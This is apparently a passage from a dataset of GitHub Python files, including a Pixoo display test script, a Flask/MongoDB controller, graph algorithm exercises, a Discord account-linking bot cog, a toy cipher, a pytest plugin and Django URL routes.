data)\n\n\ndef parse_response_packet(data: bytes) -> Any:\n return ResponsePacket.parse(CommandParser(), data)\n\n\ndef hsv_to_rgb(h: int, s: int, v: int) -> Tuple[float, float, float]:\n \"\"\"Convert HSV color space to RGB color space\n source: https://code.activestate.com/recipes/576554-covert-color-space-from-hsv-to-rgb-and-rgb-to-hsv/\n by Victor Lin, MIT license\n\n @param h: Hue\n @param s: Saturation\n @param v: Value\n return (r, g, b)\n \"\"\"\n\n hi = math.floor(h / 60.0) % 6\n f = (h / 60.0) - math.floor(h / 60.0)\n p = v * (1.0 - s)\n q = v * (1.0 - (f * s))\n t = v * (1.0 - ((1.0 - f) * s))\n return {\n 0: (v, t, p),\n 1: (q, v, p),\n 2: (p, v, t),\n 3: (p, q, v),\n 4: (t, p, v),\n 5: (v, p, q),\n }[hi]\n\n\ndef test_pattern(test: int, d: Pixoo) -> None:\n 
if test == 1:\n logger.info(\"sleep color test\")\n d.set_sleep_color(100, 0, 0)\n elif test == 2:\n logger.info(\"score board test\")\n d.set_score(23, 42)\n d.set_brightness(50)\n sleep(0.5)\n\n d.set_brightness(99)\n sleep(0.5)\n elif test == 3:\n logger.info(\"rgb+ test\")\n d.set_brightness(99)\n d.set_system_color(255, 100, 100)\n sleep(0.5)\n d.set_sleep_color(255, 0, 0)\n sleep(0.5)\n d.set_sleep_color(0, 255, 0)\n sleep(0.5)\n d.set_sleep_color(0, 0, 255)\n sleep(0.5)\n d.set_sleep_color(255, 0, 255)\n sleep(0.5)\n elif test == 4:\n logger.info(\"music viz test\")\n d.set_music_visualizer(6)\n sleep(1)\n\n logger.info(\"game mode test -> slot\")\n # 0=tetris\n # 1=slots\n # 2=dice\n # 3=eight-ball\n # 4=breakout\n # 5=tetris again?\n # 6=half a pong\n # 7=rock paper scissors\n # 8=idk some man\n d.set_game(True, 1)\n sleep(1)\n elif test == 5:\n logger.info(\"digital clock mode rainbow test\")\n # somehow this keeps Pixoo from switching away from clock mode\n d.send_app_newest_time(False)\n\n for color in ((255, 0, 0), (0, 255, 0), (0, 0, 255)):\n r, g, b = color\n resp = d.set_light_mode_clock(TimeType.RAINBOW, r, g, b)\n logger.info(f\"set clock to rainbow({r}, {g}, {b}), response: {resp}\")\n sleep(0.4)\n\n resp = d.set_light_mode_clock(TimeType.SMALL, 255, 220, 220)\n logger.info(\"set clock to small, response:\", resp)\n\n d.set_brightness(100)\n elif test == 6:\n logger.info(\"weird temperature mode test\")\n # note: this is not the temperature mode the app uses\n box_mode = d.get_box_mode()\n d.set_light_mode_temperature(box_mode)\n sleep(1)\n d.set_brightness(50)\n elif test == 7:\n logger.info(\"green analog clock test\")\n # SPP_LIGHT_CURRENT_LEVEL\n p1 = b\"\\x01\\x03\\x00\\x31\\x34\\x00\\x02\"\n # SPP_SEND_APP_NEWEST_TIME\n p2 = b\"\\x01\\x04\\x00\\x26\\x00\\x2a\\x00\\x02\"\n parse_packet(p1)\n parse_packet(p2)\n d.write(p1)\n # d.write(p2)\n # clock green\n # SPP_SET_BOX_MODE\n p3 = bytes([1, 13, 0, 69, 0, 1, 100, 1, 0, 0, 0, 0, 255, 5, 188, 1, 2])\n parse_packet(p3)\n d.write(p3)\n elif test == 8:\n logger.info(\"light mode rainbow test\")\n d.set_brightness(100)\n\n d.set_light_mode_light(0xF8, 0x01, 0x79)\n\n for h in range(0, 255, 5):\n rgb = hsv_to_rgb(h, 1, 1)\n r, g, b = [int(round(x * 255)) for x in rgb]\n d.set_light_mode_light(r, g, b)\n sleep(0.1)\n elif test == 9:\n logger.info(\"VJ test\")\n d.send_app_newest_time(False)\n for i in range(16):\n logger.info(f\"VJ mode {i}\")\n d.set_light_mode_vj(i)\n sleep(1)\n\n logger.info(\"VJ mode 2 again\")\n d.set_light_mode_vj(2)\n elif test == 10:\n logger.info(\"clock mode border test\")\n d.set_time()\n d.send_app_newest_time(False)\n d.set_light_mode_clock(TimeType.BORDER, 0x9D, 0xFC, 0x05)\n d.set_brightness(100)\n elif test == 11:\n logger.info(\"image mode mudkip test\")\n from binascii import unhexlify\n\n p = unhexlify(\n \"01860044000a0a04aa7f00f40100080000004dbbef2989c8c1c3c5ff9f00ffffff1f1f30bf5c1500002001000000002402\"\n + \"000000002402000000004402000000904409000000922449b00140922449b20d64d22469420e64e22471420e27e32471c8\"\n + \"0ff89b2449ff0d00d6b6adb60d00a06d92b40d00a06d89a40100106d89a401001049893400512802\"\n )\n parse_packet(p)\n d.write(p)\n elif test == 12:\n d.set_time()\n d.set_light_mode_clock(\n TimeType.BIG,\n 0,\n 0,\n 255,\n ActivatedModes(clock=True, weather=True, temperature=True, date=False),\n )\n d.set_brightness(10)\n\n rp = RawPixmap(16, 16)\n img = rp.load_image(\"test.png\")\n pixels = rp.decode_image(img)\n rp.set_rgb_pixels(pixels)\n\n ee = EvoEncoder()\n x = 
ee.image_bytes(rp.get_pixel_data())\n parse_packet(x)\n d.write(x)\n elif test == 13:\n d.set_music_visualizer(4)\n elif test == 14:\n d.set_game(True, 0)\n sleep(1)\n d.set_score(50, 999)\n sleep(1)\n d.set_time()\n d.set_light_mode_clock(\n TimeType.BIG,\n 0,\n 0,\n 255,\n ActivatedModes(clock=True, weather=True, temperature=True, date=False),\n )\n sleep(1)\n d.set_light_mode_vj(1)\n sleep(1)\n d.set_brightness(10)\n sleep(1)\n\n # val = bytes([BoxMode.USER_DEFINE])\n # d.write_command(Command.SET_BOX_MODE, val)\n # https://github.com/jfroehlich/node-p1x3lramen/blob/main/source/devices/pixoo.js\n # https://github.com/DavidVentura/divoom/blob/master/divoom/protocol.py\n\n val = bytes([12, WeatherType.CLEAR])\n d.write_command(Command.SET_CLIMATE, val)\n\n val = bytes([0])\n d.write_command(Command.SET_24_HOUR, val)\n sleep(1)\n else:\n raise ValueError(\"invalid test id\")\n","repo_name":"spezifisch/divo","sub_path":"divo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"19811240766","text":"from flask import Flask, request\r\nfrom model import dbConn\r\n\r\napp = Flask(__name__)\r\n\r\nclass MainController(object):\r\n# >>>>>> --- Insert user details to DB --- <<<<<<\r\n def insertUser(self, uDetails):\r\n if dbConn.db.UserCollections.count({\"Name\": uDetails['Name']}) == 0: \r\n result = dbConn.db.UserCollections.insert_one(uDetails)\r\n if (result.acknowledged):\r\n # status = 'Insert Successfull'\r\n # user = self.displayAllUser()\r\n user = self.displaySingleUser(uDetails)\r\n print(user)\r\n return user\r\n else:\r\n return 'Duplicate user'\r\n \r\n# >>>>>> --- Update the user Address --- <<<<<<\r\n def updateUser(self, uInput):\r\n userExist = self.findUser(uInput)\r\n if userExist:\r\n dbConn.db.UserCollections.update(\r\n {\r\n 'Name': uInput['Name']\r\n },\r\n {\r\n '$set':{\r\n 'Address': uInput['Address']\r\n }\r\n\r\n }, multi = False\r\n )\r\n print('Record updated successfully!!\\n', uInput)\r\n return self.displaySingleUser(uInput)\r\n else:\r\n print('User doesnot exist')\r\n return 'User doesnot exist' \r\n\r\n# >>>>>> --- Delete User Details --- <<<<<<\r\n\r\n def deleteUser(self, uInput):\r\n userExist = self.findUser(uInput)\r\n if userExist:\r\n dbConn.db.UserCollections.delete_one({\r\n 'Name': uInput['Name']\r\n })\r\n print('!!!-----Record Deleted----!!!')\r\n return self.displayAllUser()\r\n else: \r\n return 'Please enter valid user details to delete'\r\n\r\n# >>>>>> --- Display one user details --- <<<<<<\r\n def displaySingleUser(self, findUser): \r\n details = [] \r\n uCollections = dbConn.db.UserCollections.find({'Name': findUser['Name']}, {'_id':0, 'Name':1, 'Address':1})\r\n for userColumn in uCollections:\r\n details.append(userColumn)\r\n # print(details)\r\n return details\r\n \r\n# >>>>>> --- Display all user details --- <<<<<<\r\n def displayAllUser(self): \r\n users = [] \r\n uCollections = dbConn.db.UserCollections.find({}, {'_id':0, 'Name':1, 'Address':1})\r\n for allrecord in uCollections:\r\n users.append(allrecord) \r\n # print(users)\r\n return users\r\n \r\n# >>>>>> --- Checking for user if exists --- <<<<<< \r\n def findUser(self, search):\r\n if dbConn.db.UserCollections.count({\"Name\": search['Name']}) == 0:\r\n return False\r\n else:\r\n return 
True\r\n","repo_name":"Sudarshana-Shetty/MVC","sub_path":"MVC/controller/mainController.py","file_name":"mainController.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33132475907","text":"from itertools import permutations\nfrom math import sqrt\ndef solution(numbers):\n answer = 0\n numbers = list(numbers)\n size = len(numbers)\n numlist = []\n \n for i in range(1, size + 1):\n for j in permutations(numbers, i):\n j = \"\".join(j)\n if j[0] == '0' or j[-1] == '0' or j in numlist:\n continue\n numlist.append(j)\n\n for num in numlist:\n num = int(num)\n if num == 2 or num == 3: answer += 1\n if num >= 4:\n for i in range(2, int(sqrt(num))+1):\n if num % i == 0:\n break\n if i == int(sqrt(num)):\n answer += 1\n break\n\n return answer","repo_name":"123qpq/programers","sub_path":"level2/소수찾기.py","file_name":"소수찾기.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28533980025","text":"from vertex_example import *\nimport math\n\ndef bfs(G,s):\n for i in G:\n if(i != s):\n i.c = VertexColor.WHITE\n i.d2 = math.inf\n i.p = None\n q = []\n s.c = VertexColor.GRAY\n s.d2 = 0\n s.p = None\n q.append(s)\n\n while (len(q) > 0):\n u = q.pop()\n for i in u.d1:\n if (i.c == VertexColor.WHITE):\n i.c = VertexColor.GRAY\n i.d2 = u.d2+1\n i.p = u\n q.append(i)\n u.c = VertexColor.BLACK\n\ndef printPath(G, s, v):\n if(v == s):\n print(s.n)\n elif(v.p == None):\n print(\"No path from\", s.n, \"to\", v.n, \"exists!\")\n else:\n printPath(G, s, v.p)\n print(v.n)\n\ndef dfs(G):\n print(\"DFS\")\n for node in G:\n node.c = VertexColor.WHITE\n node.p = None\n time = Time()\n for node in G:\n if(node.c == VertexColor.WHITE):\n dfsVisit(G, node, time)\n\ndef dfsVisit(G, u, time):\n time.t +=1\n u.d2 = time\n u.c = VertexColor.GRAY\n for node in u.d1:\n if(node.c == VertexColor.WHITE):\n node.p = u\n dfsVisit(G, node, time)\n u.c = VertexColor.BLACK\n time.t+=1\n u.f = time.t\n print(\"Vertex:\", u.n, \"Finish time:\", u.f)\n\ndef topologicalSort(G):\n dfs(G)\n G.sort(reverse = True)\n \n\nvertex = []\n\nfor i in range(6):\n vertex.append(Vertex(c = VertexColor.WHITE, n = i+1))\n\nv0_list = []\nv0_list.append(vertex[1])\nv0_list.append(vertex[3])\nvertex[0].d1 = v0_list\n\nv1_list = []\nv1_list.append(vertex[4])\nvertex[1].d1 = v1_list\n\nv2_list = []\nv2_list.append(vertex[5])\nv2_list.append(vertex[4])\nvertex[2].d1 = v2_list\n\nv3_list = []\nv3_list.append(vertex[1])\nvertex[3].d1 = v3_list\n\nv4_list = []\nv4_list.append(vertex[3])\nvertex[4].d1 = v4_list\n\nv5_list = []\nv5_list.append(vertex[5])\nvertex[5].d1 = v5_list\n\nfor i in range(6):\n print(\"Neighbors of Vertex:\", i+1)\n for j in range(len(vertex[i].d1)):\n print(vertex[i].d1[j].n)\n print()\n\nbfs(vertex, vertex[0])\nprintPath(vertex, vertex[0], vertex[4])\n\nprint()\nprint()\ndfs(vertex)\n\nclothes = []\nundershorts = Vertex(n = \"undershorts\")\nsocks = Vertex(n = \"socks\")\npants = Vertex(n = \"pants\")\nshoes = Vertex(n = \"shoes\")\nwatch = Vertex(n = \"watch\")\nbelt = Vertex(n = \"belt\")\nshirt = Vertex(n = \"shirt\")\ntie = Vertex(n = \"tie\")\njacket = Vertex(n = \"jacket\")\n\nundershorts.d1 = [pants, shoes]\nsocks.d1 = [shoes]\npants.d1 = [belt, shoes]\nshirt.d1 = [belt, tie]\nbelt.d1 = [jacket]\ntie.d1 = [jacket]\nwatch.d1 = []\njacket.d1 = []\nshoes.d1 = 
[]\n\nclothes.append(undershorts)\nclothes.append(socks)\nclothes.append(pants)\nclothes.append(shoes)\nclothes.append(watch)\nclothes.append(belt)\nclothes.append(shirt)\nclothes.append(tie)\nclothes.append(jacket)\n\nprint()\nprint()\n\nprint(\"Topological Sort\")\n\ntopologicalSort(clothes)\nprint()\nfor i in clothes:\n print(i.n)\n","repo_name":"skostic14/PA_vezbe","sub_path":"vezba09/Zadatak/Zadatak/Zadatak.py","file_name":"Zadatak.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31138056045","text":"import disnake\n\nfrom CustomClasses.CustomBot import CustomClient\nfrom CustomClasses.CustomPlayer import MyCustomPlayer\nfrom disnake.ext import commands\nfrom CustomClasses.CustomServer import CustomServer\nfrom .eval_logic import eval_logic\n\nclass LinkWelcomeMessages(commands.Cog):\n\n def __init__(self, bot: CustomClient):\n self.bot: CustomClient = bot\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n results = await self.bot.welcome.find_one({\"$and\" : [{\"server\": member.guild.id}, {\"welcome_link_channel\" : {\"$ne\" : None}}]})\n if results is not None:\n\n link_channel = results.get(\"welcome_link_channel\")\n if link_channel is not None:\n if results.get(\"welcome_link_embed\") is not None:\n embed = disnake.Embed.from_dict(data=results.get(\"welcome_link_embed\"))\n else:\n embed = disnake.Embed(title=f\"**Welcome to {member.guild.name}!**\",\n description=f\"To link your account, press the link button below to get started.\",\n color=disnake.Color.green())\n stat_buttons = [disnake.ui.Button(label=\"Link Account\", emoji=\"🔗\", style=disnake.ButtonStyle.green,\n custom_id=\"Start Link\"),\n disnake.ui.Button(label=\"Help\", emoji=\"❓\", style=disnake.ButtonStyle.grey,\n custom_id=\"Link Help\")]\n buttons = disnake.ui.ActionRow()\n for button in stat_buttons:\n buttons.append_item(button)\n if member.guild.icon is not None:\n embed.set_thumbnail(url=member.guild.icon.url)\n try:\n channel = await self.bot.getch_channel(link_channel, raise_exception=True)\n if member.guild.id == 923764211845312533:\n await channel.send(content=member.mention, embed=embed, components=[stat_buttons], allowed_mentions=disnake.AllowedMentions.none())\n else:\n await channel.send(content=member.mention, embed=embed, components=[stat_buttons])\n except (disnake.NotFound, disnake.Forbidden):\n await self.bot.welcome.update_one({\"server\": member.guild.id}, {\"$set\" : {\"link_channel\" : None}})\n\n @commands.Cog.listener()\n async def on_button_click(self, ctx: disnake.MessageInteraction):\n\n if ctx.data.custom_id == \"Start Link\":\n components = [\n disnake.ui.TextInput(\n label=\"Player Tag\",\n placeholder=\"Your player tag as found in-game.\",\n custom_id=f\"player_tag\",\n required=True,\n style=disnake.TextInputStyle.single_line,\n max_length=12,\n )\n ]\n token_option = await self.bot.server_db.find_one({\"server\": ctx.guild.id})\n token_option = token_option.get(\"api_token\", True)\n\n if token_option:\n token_text = \"Api Token\"\n else:\n token_text = \"(Optional) Api Token\"\n components.append(\n disnake.ui.TextInput(\n label=token_text,\n placeholder=\"Your Api Token as found in-game.\",\n custom_id=f\"api_token\",\n required=token_option,\n style=disnake.TextInputStyle.single_line,\n max_length=12,\n ))\n await ctx.response.send_modal(\n title=\"Link your account\",\n custom_id=\"linkaccount-\",\n components=components)\n\n def check(res):\n return 
ctx.author.id == res.author.id\n\n try:\n modal_inter: disnake.ModalInteraction = await self.bot.wait_for(\n \"modal_submit\",\n check=check,\n timeout=300,\n )\n except:\n return\n\n player_tag = modal_inter.text_values[\"player_tag\"]\n api_token = modal_inter.text_values[\"api_token\"]\n if not modal_inter.response.is_done():\n await modal_inter.response.defer(ephemeral=True)\n server = CustomServer(guild=ctx.guild, bot=self.bot)\n change_nickname = await server.nickname_choice\n\n player: MyCustomPlayer = await self.bot.getPlayer(player_tag=player_tag, custom=True)\n if player is None:\n clan = await self.bot.getClan(clan_tag=player_tag)\n if clan is not None:\n embed = disnake.Embed(\n description=f\"Sorry, `{player_tag}` is invalid and it also appears to be the **clan** tag for {clan.name}\\nUse the image below to help find your player tag.\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n return await modal_inter.send(embed=embed, ephemeral=True)\n else:\n embed = disnake.Embed(\n description=f\"**Sorry, `{player_tag}` is an invalid player tag** :( \\nUse the image below to help find your player tag.\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n return await modal_inter.send(embed=embed, ephemeral=True)\n\n link_id = await player.linked()\n\n if token_option:\n verified = await player.verify(api_token=api_token)\n elif link_id != ctx.author.id and link_id is not None:\n verified = await player.verify(api_token=api_token)\n else:\n verified = True\n\n if link_id == ctx.author.id:\n embed = await eval_logic(bot=self.bot, guild=ctx.guild, members_to_eval=[ctx.author], role_or_user=ctx.author,\n test=False,\n change_nick=change_nickname,\n return_embed=True)\n return await modal_inter.send(embed=embed, ephemeral=True)\n elif verified:\n try:\n await self.bot.link_client.delete_link(player.tag)\n except:\n pass\n await player.add_link(ctx.author)\n embed: disnake.Embed = await eval_logic(bot=self.bot, guild=ctx.guild, members_to_eval=[ctx.author], role_or_user=ctx.author,\n test=False,\n change_nick=change_nickname,\n return_embed=True)\n embed.title = f\"**{player.name} successfully linked**\"\n await modal_inter.send(embed=embed, ephemeral=True)\n try:\n results = await self.bot.clan_db.find_one({\"$and\": [\n {\"tag\": player.clan.tag},\n {\"server\": ctx.guild.id}\n ]})\n if results is not None:\n greeting = results.get(\"greeting\")\n if greeting is None:\n badge = await self.bot.create_new_badge_emoji(url=player.clan.badge.url)\n greeting = f\", welcome to {badge}{player.clan.name}!\"\n channel = results.get(\"clanChannel\")\n channel = self.bot.get_channel(channel)\n await channel.send(f\"{ctx.author.mention}{greeting}\")\n except:\n pass\n elif not verified:\n if token_option:\n embed = disnake.Embed(\n description=f\"The player you are looking for is [{player.name}]({player.share_link}), however it appears u may have made a mistake.\\n Double check your api token again.\",\n color=disnake.Color.red())\n await modal_inter.send(embed=embed, ephemeral=True)\n else:\n embed = disnake.Embed(\n description=f\"[{player.name}]({player.share_link}) is already linked to another user. 
Please try again with an api token.\",\n color=disnake.Color.red())\n await modal_inter.send(embed=embed, ephemeral=True)\n\n\n elif ctx.data.custom_id == \"Link Help\":\n embed = disnake.Embed(title=\"Finding a player tag\",\n description=f\"- Open Game\\n- Navigate to your account's profile\\n- Near top left click copy icon to copy player tag to clipboard\\n\"\n f\"- Make sure it is the player tag & **not** the clan\\n- View photo below for reference\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n embed2 = disnake.Embed(\n title=\"What is your api token? \",\n description=f\"- Reference below for help finding your api token.\\n- Open Clash and navigate to Settings > More Settings\\n- **OR** use the following link:\\nhttps://link.clashofclans.com/?action=OpenMoreSettings\" +\n \"\\n- Scroll down to the bottom and copy the api token.\\n- View the picture below for reference.\",\n color=disnake.Color.red())\n embed2.set_image(\n url=\"https://cdn.discordapp.com/attachments/843624785560993833/961379232955658270/image0_2.png\")\n await ctx.send(embeds=[embed, embed2], ephemeral=True)\n\ndef setup(bot: CustomClient):\n bot.add_cog(LinkWelcomeMessages(bot))","repo_name":"MagicTheDev/ClashKing","sub_path":"Link_and_Eval/link_button.py","file_name":"link_button.py","file_ext":"py","file_size_in_byte":10268,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"5729895008","text":"from _Crypt import *\n\nclass Encryption:\n method,message,_key,_cipher = 0,'','',''\n def __init__(self,method= 5,message='',key=''):\n self.set_all(method,message,key)\n\n def set_all(self,method,message,key):\n self.set_method(method)\n self.set_message(message)\n self.set_key(key)\n\n def set_method(self,method = 5):\n if set_technique(method):\n self.method = method\n else:\n print('Invalid method it should be (4<= method <=8) {default = 5}')\n\n def set_message(self,message):\n self.message = message\n\n def append_message(self,append_string):\n self.message += append_string\n \n def set_key(self,key):\n if set_key(key):\n self._key = key\n else:\n raise 'Invalid Key, It should be valued 0< key <(2^(technique))'\n\n def set_limit(self,limit):\n set_limit(limit)\n\n def Encrypt(self,technique=0, message='', key=''):\n if technique == 0 : technique=self.method\n if message == '' : message = self.message\n if key == '' : key = self._key\n self.set_all(technique,message,key)\n _size = get_size()\n _right_shift = break_rshift(message) #break and right shift the message\n _binary_msg = unival_bin(_right_shift) #UTF-8 formed binary of unicode value \n _divided_bin = '' #will hold the divided binary values(sized=_size+1)\n self._cipher = '' #will hold the characters after encryption\n for i in range(0,len(_binary_msg),_size): #divides the message chunk by chunk\n temp_bin_str = _binary_msg[i:i+_size]\n _divided_bin += divide(temp_bin_str)\n for i in range(0,len(_divided_bin),_size+1): #will create the cipher text of _size+1 bit chunks\n temp_bin_str = _divided_bin[i:i+_size+1]\n self._cipher += bin_cipher(temp_bin_str)\n return self._cipher\n\nclass Decryption:\n method,cipher,_key,_message = 0,'','',''\n def __init__(self,method= 5,cipher='',key=''):\n self.set_all(method,cipher,key)\n\n def set_all(self,method,cipher,key):\n self.set_method(method)\n self.set_cipher(cipher)\n self.set_key(key)\n\n def set_method(self,method = 5):\n if set_technique(method):\n 
self.method = method\n else:\n print('Invalid method it should be (4<= method <=8) {default = 5}')\n\n def set_cipher(self,cipher):\n self.cipher = cipher\n \n def set_key(self,key):\n if set_key(key):\n self._key = key\n else:\n return 'Invalid Key, It should be valued 0< key <(2^(technique))'\n\n def set_limit(self,limit):\n set_limit(limit)\n\n def Decrypt(self,method=0,cipher='',key=''):\n if method == 0 : method = self.method\n if cipher == '' : cipher = self.cipher\n if key == '' : key = self._key\n self.set_all(method,cipher,key)\n _size = get_size()\n _cipher_bin = cipher_bin(cipher)\n _mul_byte = ''\n self._message = ''\n for i in range(0,len(_cipher_bin),_size+1):\n byte = _cipher_bin[i:i+_size+1]\n _mul_byte += multiply(byte)\n _bin_unicode = bin_unicode(_mul_byte)\n self._message = break_lshift(_bin_unicode)\n return self._message\n\n","repo_name":"ErHarshRathore/FileEncryptor","sub_path":"Crypt.py","file_name":"Crypt.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14338338989","text":"from pathlib import Path\nimport shutil\n\nfrom pytest import Collector, Parser, PytestPluginManager\n\nfrom . import hooks, items\n\n\ndef pytest_addoption(parser: Parser):\n group = parser.getgroup(\"cmake-presets\", description=\"cmake presets options\")\n group.addoption(\n \"--cmake\",\n help=\"Path to the cmake executable to use in configure, build, and workflow presets\",\n default=shutil.which(\"cmake\"),\n type=Path,\n )\n group.addoption(\n \"--ctest\",\n help=\"Path to the ctest executable to use for test presets\",\n default=shutil.which(\"ctest\"),\n type=Path,\n )\n group.addoption(\n \"--cpack\",\n help=\"Path to the cpack executable to use for package presets\",\n default=shutil.which(\"cpack\"),\n type=Path,\n )\n\n\ndef pytest_addhooks(pluginmanager: PytestPluginManager):\n pluginmanager.add_hookspecs(hooks)\n pluginmanager.register(items)\n\n\ndef pytest_collect_file(parent: Collector, file_path: Path) -> Collector | None:\n if file_path.name == \"CMakePresets.json\":\n return items.CMakePresetsFile.from_parent(parent, path=file_path.parent)\n","repo_name":"ixm-one/pytest-cmake-presets","sub_path":"src/cmake_presets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72310699040","text":"\"\"\"added goal properties\n\nRevision ID: 5018059c5c8f\nRevises: 16b4a243d41d\nCreate Date: 2015-09-23 11:56:01.897992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5018059c5c8f'\ndown_revision = '16b4a243d41d'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('goalproperties',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), nullable=False),\n sa.Column('is_variable', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('goals_goalproperties',\n sa.Column('goal_id', sa.Integer(), nullable=False),\n sa.Column('property_id', sa.Integer(), nullable=False),\n sa.Column('value', sa.String(length=255), nullable=True),\n sa.Column('value_translation_id', sa.Integer(), nullable=True),\n sa.Column('from_level', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['goal_id'], ['goals.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['property_id'], ['goalproperties.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['value_translation_id'], ['translationvariables.id'], ondelete='RESTRICT'),\n sa.PrimaryKeyConstraint('goal_id', 'property_id', 'from_level')\n )\n op.add_column(u'goals', sa.Column('name', sa.String(length=255), nullable=False, server_default=\"\"))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(u'goals', 'name')\n op.drop_table('goals_goalproperties')\n op.drop_table('goalproperties')\n ### end Alembic commands ###\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/ActiDoo/gamification-engine/gengine/alembic/versions/5018059c5c8f_added_goal_properties.py","file_name":"5018059c5c8f_added_goal_properties.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18408680148","text":"#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\nif __name__ == \"__main__\":\n\n for line in sys.stdin:\n\n num, letters = line.strip().split()\n letters = letters.split(',')\n \n if len(num) == 1:\n num = \"0\" + num\n\n for letter in letters:\n print (\"{}\\t{}\".format(letter, num))\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-DanielDi","sub_path":"pregunta_10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22601319457","text":"emoji_dict = {\":)\": \"🙂\", \":(\": \"🙁\", \":P\": \"😋\", \":/\": \"😕\", \"<3\": \"❤\"}\n\n\ndef display(data):\n new_data = data\n\n if data == \"ADMIN\":\n emo_1 = input(\"Emoji RAW : \")\n emo_2 = input(\"Emoji OP : \")\n emoji_dict[emo_1] = emo_2\n print(\"Emoji inserted...\")\n else:\n for i in emoji_dict.keys():\n if i in data:\n new_data = new_data.replace(i, emoji_dict[i])\n print(\"OLD :\", data)\n print(\"NEW :\", new_data)\n return\n\n\nif __name__ == \"__main__\":\n while True:\n text = input(\"Type your Message : \")\n if text == \"N\" or text == \"n\":\n break\n else:\n display(text)\n print(\"--END--\")\n","repo_name":"sanyamcodes26/Efforts","sub_path":"OGma/5_Emoji.py","file_name":"5_Emoji.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42987314986","text":"from django.conf.urls import include, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import path\n\nfrom rh.views import (AtivismoDetalhesView, AtivismoView, BibliotecaView,\n CanaisProprietariosView, CertificacaoView,\n ClienteAtivosView, ClienteDetalhesView,\n ClienteInativosView, ClienteView, ClimaDetalhesView,\n ClimaView, 
ColaboradoresDetalhesView, ColaboradoresView,\n ContatoView, CursoDetalhesView, CursoView,\n FeedbackDetalhesView, FeedbackView, FerramentaView,\n FinanceiroDetalhesView, FinanceiroTotalView,\n FolguinhaView, FornecedoresDetalhesView,\n FornecedoresView, HierarquiaView, IndexView,\n InscricaoView, JuridicoView, LoginShootView,\n LogoutShootView, MomentoImportanteView, NewsletterView,\n PalestraView, PremiacaoView, ProjetoDetalhesView,\n ProjetoView, PromocaoView, PropostaDetalhesView,\n PropostaView, ResultadoCanalView, TipoProjetoView,\n VisaoView, WorkshopView)\n\nurlpatterns = [\n path(\"ativismo/\", AtivismoView.as_view(), name=\"ativismo\"),\n path(\"ativismo//\", AtivismoDetalhesView.as_view(), name=\"detalhes_ativismo\"),\n path(\"biblioteca/\", BibliotecaView.as_view(), name=\"biblioteca\"),\n path(\"canais/\", CanaisProprietariosView.as_view(), name =\"canaisproprietarios\"),\n path(\"certificacoes/\", CertificacaoView.as_view(), name =\"certificacoes\"),\n path(\"clientes/\", ClienteView.as_view(), name=\"lista_cliente\"),\n path(\"clientes/ativos/\", ClienteAtivosView.as_view(), name=\"lista_cliente_ativos\"),\n path(\"clientes/inativos/\", ClienteInativosView.as_view(), name=\"lista_cliente_inativos\"),\n path(\"clientes//\", ClienteDetalhesView.as_view(), name=\"detalhes_cliente\"),\n path(\"clima/\", ClimaView.as_view(), name=\"lista_climas\"),\n path(\"clima//\", ClimaDetalhesView.as_view(), name=\"clima\"),\n path(\"colaboradores/\", ColaboradoresView.as_view(), name=\"lista_colaboradores\"),\n path(\"colaboradores//\", ColaboradoresDetalhesView.as_view(), name=\"detalhes_colaborador\"),\n path(\"contato/\", ContatoView.as_view(), name=\"contato\"),\n path(\"curso/\", CursoView.as_view(), name=\"curso\"),\n path(\"curso//\", CursoDetalhesView.as_view(), name=\"lista_curso\"),\n path(\"feedback/\", FeedbackView.as_view(), name=\"feedback\"),\n path(\"ferramentas/\", FerramentaView.as_view(), name=\"ferramentas\"),\n path(\"feedback//\", FeedbackDetalhesView.as_view(), name=\"detalhes_feedback\"),\n path(\"financeiro/\", FinanceiroTotalView.as_view(), name=\"contas\"),\n path(\"financeiro//\", 